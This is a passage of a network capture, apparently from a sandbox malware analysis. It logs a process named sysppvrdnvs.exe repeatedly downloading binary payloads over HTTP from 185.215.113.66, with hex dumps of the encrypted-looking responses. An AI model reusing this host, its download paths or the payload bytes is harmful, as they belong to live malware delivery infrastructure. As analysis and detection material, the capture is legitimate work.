f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUYmj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f\|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
Oct 26, 2024 07:26:52.901271105 CEST	112	IN	Data Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03 Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y\|^WaO".m).=WP
Oct 26, 2024 07:26:52.901284933 CEST	1236	IN	Data Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
Oct 26, 2024 07:26:52.901299000 CEST	1236	IN	Data Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9 Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fO
Oct 26, 2024 07:26:52.901312113 CEST	1236	IN	Data Raw: 84 70 54 7d 76 a7 80 23 30 99 b6 5d 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e Data Ascii: pT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7\|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9
Oct 26, 2024 07:26:52.901324034 CEST	536	IN	Data Raw: 03 c4 8d f3 91 32 4d 71 23 2b b6 64 8c 4d 8f 93 31 e2 1e fb af 3b 6f 02 ab bb c8 79 d0 e2 41 b5 7a 6d ab 40 21 3c 82 19 45 fe 84 e5 c5 6e 6b 20 3f dd 13 d4 43 0a 1a bb b4 e1 3d 7c 39 50 9e c0 b5 a3 65 f5 7f 64 6e dd 19 47 0b 44 ba 46 25 a8 ea 9e Data Ascii: 2Mq#+dM1;oyAzm@!<Enk ?C=\|9PednGDF%F-_!Y^uODIuH"oR^k=%S\(L7QREU6=oNL \|~;vF\|5qOh[IO*9%i0q~3T\|UJ
Oct 26, 2024 07:26:52.901421070 CEST	1236	IN	Data Raw: 12 8c 9f 7f ea 55 4e ea 89 8e 37 4c b1 06 e7 27 d9 14 41 d9 87 c1 9a eb 34 cc 48 8b 74 91 85 10 5c 82 b8 69 73 bc 0a f6 85 c4 e2 8a 6f 68 a7 ef 00 f7 90 2d e4 25 9a 61 7e d2 db 34 07 d9 cc 41 37 f5 c2 b7 6e 37 c8 e6 43 3b 01 93 30 50 a7 1c b9 51 Data Ascii: UN7L'A4Ht\isoh-%a~4A7n7C;0PQCgkwNz8NMxAbZYPU4]&^eqDuTbF8]UNNK4KngmqT-x9>C?EMJK;fY(TQFSq3Vr)k!?jpb,
Oct 26, 2024 07:26:52.901433945 CEST	1236	IN	Data Raw: a3 5d 10 95 a7 74 b6 bd fe c6 c9 12 03 83 34 fd 15 69 cf c8 fe 55 b2 ed 61 ec 41 49 bc 64 a0 42 b3 ac 4a 85 83 00 2b 3a 92 4f 22 46 0c 37 26 dd da 56 a0 6e 23 a9 52 e0 6a 2a e5 1f 24 2e f0 7a 22 1b 05 a3 f3 9a a7 0e 57 86 82 d7 c4 74 2c 71 4e 03 Data Ascii: ]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN\|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@=:pj\|KYD
Oct 26, 2024 07:26:52.901446104 CEST	424	IN	Data Raw: 57 21 09 ae 12 41 32 4f 75 e6 60 0d 48 d7 82 a7 f1 a9 30 77 2e f3 7a c7 2b ff f9 56 6a 32 57 ca bd 80 37 72 35 81 48 51 9e 7f a7 92 f4 bf ff de 88 c8 93 ee e2 5d a0 c3 86 88 51 28 33 be 06 de c9 e8 6a 3f f4 a4 c0 76 cb 4b 3d fb 7b ae 2c 83 a5 00 Data Ascii: W!A2Ou`H0w.z+Vj2W7r5HQ]Q(3j?vK={,m@^1?vHl6=Nke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8M
Oct 26, 2024 07:26:52.901456118 CEST	736	IN	Data Raw: 61 47 a0 ff c8 81 53 ad 52 24 88 3e dd 90 18 b5 4d ff ff 89 0f a4 9d fe f2 c6 39 94 da 3c 0e d2 cb 7b 7f fe e9 fe f4 79 b0 71 80 e5 35 c3 cd ee 0d 42 79 d9 d3 2f f6 d3 04 f3 e3 4d 49 49 24 d6 57 35 bd 17 eb f3 56 c8 16 66 cd 58 23 20 23 e1 52 1e Data Ascii: aGSR$>M9<{yq5By/MII$W5VfX# #RT@: IrjJY^O;P)wZ=xAMP]%(1%fi>#qkx+,Gm7J"`U^{TMaDRq-IV% 8y?IH7B7#R?QfE^/
Oct 26, 2024 07:26:59.044538975 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:26:59.325740099 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:59 GMT Content-Type: application/octet-stream Content-Length: 16128 Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT Connection: keep-alive ETag: "66f3a973-3f00" Accept-Ranges: bytes Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED] Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H\|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:\|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
Oct 26, 2024 07:26:59.325766087 CEST	1236	IN	Data Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12 Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H\|f\|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49906	185.215.113.66	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:00.346452951 CEST	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:01.277582884 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:01 GMT Content-Type: application/octet-stream Content-Length: 16128 Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT Connection: keep-alive ETag: "66f3a973-3f00" Accept-Ranges: bytes Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED] Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H\|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:\|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
Oct 26, 2024 07:27:01.277604103 CEST	1236	IN	Data Raw: 49 24 02 da 57 17 86 62 ea 4f b3 98 a8 06 64 68 e4 0e 11 0e 16 b4 f3 7d b0 7f 4e f3 b6 bb c5 b4 04 d0 bf 65 7f 95 6e fe ce e4 7b b2 ca f9 ec 06 09 b6 58 0e 05 a0 aa 0b 83 ec 25 fb e4 1d e9 c0 9d 1e 4d 8c be fd 63 31 5e 38 76 9c 34 c9 48 ba b1 12 Data Ascii: I$WbOdh}Nen{X%Mc1^8v4H\|f\|'x\R')Z{iC,}'hCh5[wRG@XB;G[-iC+(?E=y[$He
Oct 26, 2024 07:27:01.277623892 CEST	1236	IN	Data Raw: 79 66 85 08 93 95 1d 74 ce 4a 11 6d 82 e1 0a e2 81 2a fe 53 85 e7 03 3d 26 89 2a ac bc 6b 82 a8 ad b3 ff 6f 2b 13 be 1a 78 df 38 94 08 4e 19 a1 85 a6 e7 97 55 2a 34 6a c4 05 a0 b4 7d d6 cf ac 4f ad fd 67 d8 7a 3f 8d 05 43 ee 09 c1 87 a8 e4 28 65 Data Ascii: yftJmS=&ko+x8NU4j}Ogz?C(ekds&;`!R[8ipurbyc'Xgy88(BAoqb\3mc2kg&;Rao#``2C(BRcAEy3.(d{A
Oct 26, 2024 07:27:01.277637005 CEST	1236	IN	Data Raw: 13 cc c0 02 63 9a f7 32 ef 05 a2 d8 0c a2 f0 13 e8 02 8c 5a 9f a4 b1 f5 8e 8e f2 44 26 09 e9 eb 90 01 b6 1f 6f ef 7a 7b 6f 72 b5 32 43 3f 03 45 5d 21 47 fb e4 6d 8f 19 57 dc 36 a6 1f d0 65 d6 13 fb 52 58 f0 b0 74 c9 f1 06 93 12 b1 0d 2c 66 18 38 Data Ascii: c2ZD&oz{or2C?E]!GmW6eRXt,f8}(nr(D3:cGl6fq{>QAB1T[~3#VPv\|lF;yHu^-z\|&#BzHrsexJJe"x
Oct 26, 2024 07:27:01.277648926 CEST	1236	IN	Data Raw: 4d b9 18 90 d4 38 76 76 8e 16 f6 0a 59 48 91 a3 93 98 f2 86 31 48 c5 b8 1a b7 55 d7 56 ae db 47 94 4e e3 d4 dd cd 6f 2d b7 81 e1 b6 d4 ac be 14 1b 6b 69 39 d1 1e 41 b7 ed ba 57 d3 37 f5 b2 53 02 3c 83 b2 18 e9 a1 27 03 1c a4 eb 7d e8 fa 1e 6f 09 Data Ascii: M8vvYH1HUVGNo-ki9AW7S<'}o.M7"e}'d\(K+\3C[6N3nrd#Yf4UfQ"^,`:f=kF'OG.u2~o8?_s}T^_+=y?PtVOD/m
Oct 26, 2024 07:27:01.277734041 CEST	1236	IN	Data Raw: 4f 36 8d 05 da 5c ca f9 1d 18 96 00 dc 48 47 90 13 65 65 64 2d 4e c1 68 05 ef 3e 9d 8a 67 21 e9 b6 f3 2e 6c 4f 09 4a d5 87 91 b3 ff e9 78 db e7 c1 81 1a e5 89 5d 01 20 b6 ed 36 d0 9a 77 60 5e ac 0d 60 e7 ba 6d 93 dd 50 71 50 01 0a 37 8e f6 4d d6 Data Ascii: O6\HGeed-Nh>g!.lOJx] 6w`^`mPqP7M\T!jJF?KEmxc:;>br'C9x~..6Ova,Ix%QL6(H-oeq@.>SX~^x~QKCmJr1FhW
Oct 26, 2024 07:27:01.277745962 CEST	1236	IN	Data Raw: a5 47 ae 60 c6 b5 70 43 57 2e 84 11 30 03 79 02 7e 7d 73 44 6d a2 db 84 77 18 69 9c 9f 75 f5 76 af 41 23 6b 13 51 42 17 3c be db 7c 84 88 fb e2 da f2 65 8d 0b 62 2c 4b 79 66 5d ee f3 bb 15 3b ab 1b 56 62 d8 0c b0 a4 49 6f 7a d1 a2 41 85 9f 6d b6 Data Ascii: G`pCW.0y~}sDmwiuvA#kQB<\|eb,Kyf];VbIozAmfE7F_,ZILF^WV$YW\|xL}YZOEY@eFhPF~1JG@ye4#m5YE8mA!pV7>S?5XK
Oct 26, 2024 07:27:01.277756929 CEST	1236	IN	Data Raw: 4c 4c 5e 46 4b 3f cc 38 f3 38 6a b7 1b b4 61 55 4f 8b 88 f8 ef a4 cb f6 e6 6f 9a 71 f6 85 c6 67 29 b2 d3 47 31 6f f9 f8 9c 58 a4 77 6f 01 81 20 84 f0 e5 56 fe b6 63 9e 19 67 f5 49 a2 3b 73 e6 83 01 dd 61 a2 32 1c a4 8e 2f 69 7d 1c 72 00 85 fb ec Data Ascii: LL^FK?88jaUOoqg)G1oXwo VcgI;sa2/i}rIumW=erZ]P#A/r#5qbdXwb>0C-][Iu8gg^*l8"W~Qx! jtDsCZw\]9
Oct 26, 2024 07:27:01.277780056 CEST	1236	IN	Data Raw: 69 80 cd 68 c5 e9 4e da 40 85 07 ec d4 32 95 0f 56 a7 9f 5f 0e 56 44 38 8e af 99 79 c8 ae d2 3d 75 ec 57 60 08 93 cc b5 53 79 cc ce 09 27 52 b2 e7 10 ee 08 dd 15 2b 90 b1 72 7e db 7c 5f 9b 9d 9a 7c b1 3b 4f e2 a0 37 d0 a9 62 27 4c d9 08 6d 7a 92 Data Ascii: ihN@2V_VD8y=uW`Sy'R+r~\|_\|;O7b'Lmz?#OcJoy+N2mjoKG,$3wk]@?XD{KJ$KeLxD0^T3-nj*Q2\|`wG):
Oct 26, 2024 07:27:01.277801991 CEST	1236	IN	Data Raw: 4c df fa b5 35 96 10 92 22 cb a1 1f 3f 51 e4 b4 84 be b5 9b fd f1 00 d0 2d 17 5c 06 90 5a fe 7e 17 37 c0 05 e4 04 c5 68 6e d1 e0 86 a5 b0 5a 94 97 bb 62 e8 8b 23 25 b2 50 64 34 31 c9 54 b1 e8 49 69 4c b5 73 38 9b 44 7e ea 50 94 0a ba 7b e7 36 04 Data Ascii: L5"?Q-\Z~7hnZb#%Pd41TIiLs8D~P{6Q:G+#>BPt]B63hcw0s^?i=YocVqY20L&)P3},`C[v-8c(dj7FX%w^'Es=#O
Oct 26, 2024 07:27:01.283193111 CEST	1120	IN	Data Raw: 99 3f ea 14 b2 c6 06 ed 5e 4f 62 e9 d3 02 f8 53 d5 a6 b9 d6 63 7f 86 28 e5 48 bd ee ff a7 81 73 f5 80 12 f2 11 90 3a da 32 71 4b 4d d8 bf 2d 3a 96 1f 9d 8d 54 17 f5 68 45 d6 c3 52 cd 84 38 47 f2 cf 7e 2b 9f e1 79 fa 7c 81 dd b4 2e b7 34 0a 80 cb Data Ascii: ?^ObSc(Hs:2qKM-:ThER8G~+y\|.4sX"FCJBzZA[uC^dR1w@x'L_FgvskvLxu(g/h8P5('<\|P=n7j"ZgVPjFZ7)
Oct 26, 2024 07:27:07.544261932 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:07.823899031 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:07 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49950	185.215.113.66	80	7612	C:\Windows\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:09.032888889 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:09.900744915 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:09 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Oct 26, 2024 07:27:09.900803089 CEST	1236	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
Oct 26, 2024 07:27:09.900854111 CEST	1236	IN	Data Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1 Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\
Oct 26, 2024 07:27:09.900887966 CEST	1236	IN	Data Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02 Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SUrN1QIuc>"W\|1Rrm]T1&PSTQZqEtgc[U,@+LoR0rMwfu^VUzcie_$eM;B
Oct 26, 2024 07:27:09.900924921 CEST	1236	IN	Data Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36 Data Ascii: sarI4ns;?E;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4Hft5U>1uauV\|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
Oct 26, 2024 07:27:09.900959015 CEST	960	IN	Data Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2 Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4\|bob`\|bS
